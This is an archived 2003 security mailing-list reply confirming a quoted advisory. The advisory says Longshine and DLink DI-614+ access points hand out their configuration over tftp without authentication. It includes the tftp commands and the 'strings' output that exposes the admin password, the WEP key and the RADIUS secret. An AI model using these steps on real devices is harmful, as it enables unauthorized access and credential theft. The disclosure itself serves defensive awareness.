heydowns_at_borg.com
Date: Mon Jan 06 2003 - 12:57:52 CST


    This vulnerability is also an issue on the popular DLink DI-614+ (which I
    think is based upon the Longshine product). I was able to grab config.img
    and also extract the "admin" password from it. This was confirmed with
    firmware version 2.03 dated 9/10/2002.

    On the DLink product, you can only perform this from the "LAN-side" of the
    device in the default configuration.

    DLink has version 2.10 available, dated 11/25/2002, but I have not tried
    it yet.

            -Jeff

    On Mon, 6 Jan 2003, Lukas Grunwald wrote:

    >
    >
    > Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
    >
    > Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
    >
    > Description: Get Superuser Privileges and view the device's password and other passwords
    >
    > Versions affected: tested with 03.01.0b and 03.01.0h
    >
    > Vendor contacted: e-mailed Longshine at Sun Dec 29
    >
    > Details: You are able to connect via tftp to the access point and you can download the configuration
    > without authentication.
    > In this configuration the username of the superuser and the corresponding password are stored.
    > The WEP secret for the encryption and the password from your RADIUS server are also readable.
    > This "attack" works via WLAN (!!!) and Ethernet.
    >
    > tftp
    > tftp> connect 192.168.108.48
    > tftp> get config.img
    > Received 780 bytes in 1.0 seconds
    > tftp> quit
    >
    > [~]/-\>strings config.img
    > DNXLABAP01 <- name of the AP
    > root <- name of the superuser
    > XXXXXX123 <- password from superuser
    > DNXLABLAN <- ssid
    > secu9 <- secret for WEP
    > 7890abcdef <-
    >
    > You are also able to get the following files:
    >
    > config.img
    > wbtune.dat
    > mac.dat
    > rom.img
    > normal.img
    >
    >
    > Solution: after contact with the vendor he claims that a new firmware-upgrade
    > fixes this problem, but the latest available firmware on his web-page
    > doesn't fix it anyway.
    >
    > Vendor-Contact:
    >
    > LONGSHINE Technologie (Europe) GmbH
    >
    > An der Strusbek 9
    > D-22926 Ahrensburg
    >
    > Tel: ++ 49 ( 0 ) 4102 / 4922- 0
    > Fax: ++ 49 ( 0 ) 4102 / 40109
    >
    > supportlongshine.de
    >